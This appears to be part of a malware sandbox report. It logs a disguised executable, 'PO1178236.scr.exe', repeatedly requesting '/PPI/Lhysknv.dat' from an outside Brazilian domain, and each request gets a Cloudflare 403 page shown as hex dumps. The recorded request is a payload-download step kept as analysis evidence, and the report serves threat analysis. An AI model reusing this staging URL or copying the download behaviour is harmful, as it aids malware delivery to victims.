        2025-01-09 07:35:58 UTC1369INData Raw: 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77
        Data Ascii: /title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-w
        2025-01-09 07:35:58 UTC1369INData Raw: 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61 2d 63
        Data Ascii: ghlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-c
        2025-01-09 07:35:58 UTC1369INData Raw: 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 30 66 30 37 64 30 34 34 33 37 30 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c
        Data Ascii: border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c0f07d044370</strong></span> <span class="cf-footer-separator sm:hidden">&bul
        2025-01-09 07:35:58 UTC994INData Raw: 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 30 66 30 37 64 30 34 34 33 37 30 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 31 4f 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63
        Data Ascii: cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c0f07d044370',t:'MTczNjQwODE1OC4wMDAwMDA='};var a=doc
        2025-01-09 07:35:58 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        6192.168.2.949713188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:35:59 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:35:59 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:35:59 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:14 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zm37ewk%2FydhQGaM3xDekFSV6WASRKlSzJXusftoskLjlUeLz55o14lexjfYVh%2FgSol%2Fkj8YCzmQjtCLO0YDD7IqJcT6%2BKtTk1mfrmIGOEFbW2joFFtqdrmT8mdd3Icxm70se47iXCx%2Fqbb%2Bj"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c0f44b6ade92-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1657&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1744324&cwnd=239&unsent_bytes=0&cid=29c4b35f806674d6&ts=145&x=0"
        2025-01-09 07:35:59 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:35:59 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:35:59 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:35:59 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 30 66 34 34 62 36 61 64 65 39 32 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c0f44b6ade92</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:35:59 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 30 66 34 34 62 36 61 64 65 39 32 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 31 4f 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c0f44b6ade92',t:'MTczNjQwODE1OS4wMDAwMDA='}
        2025-01-09 07:35:59 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        7192.168.2.949714188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:00 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:00 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:00 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:15 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=El7bYXfhMSAc9VeeSLPXxwOaTUj3J3c8%2BwKpqWzV4req2MDqt0%2BF0zh5zH5moM6JQ9A4%2BblCpTkKzv6b2ImOR33z2Zk0hwWivZSmrECoI2Dy0uK7pbFNgKGohvDTGr3T3%2Fg1jSkJsgEg59kF"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c0f88ca043f7-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2100&min_rtt=2100&rtt_var=788&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1387173&cwnd=213&unsent_bytes=0&cid=8ade321fae307dec&ts=156&x=0"
        2025-01-09 07:36:00 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:00 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:36:00 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:36:00 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 30 66 38 38 63 61 30 34 33 66 37 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c0f88ca043f7</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:36:00 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 30 66 38 38 63 61 30 34 33 66 37 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 32 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c0f88ca043f7',t:'MTczNjQwODE2MC4wMDAwMDA='};var
        2025-01-09 07:36:00 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        8192.168.2.949715188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:00 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:01 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:01 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:15 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O599fuIlAITKHRnEHF1yx%2BvR3CdA73jdVRr2VHsLB2GLxOSPNG9DDvLAwZszD5WTCUd5BMaE57cLdLsfrm%2FSPp%2FwTOJwfdL%2F6cAjgg7hJzYYDkqqnMbbrfsDMkEn0kdaN4o4MfoBFZK8qKD%2B"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c0fe381b0f9f-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1466&min_rtt=1465&rtt_var=553&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1972972&cwnd=213&unsent_bytes=0&cid=36f4e4f3b5aaab81&ts=350&x=0"
        2025-01-09 07:36:01 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:01 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
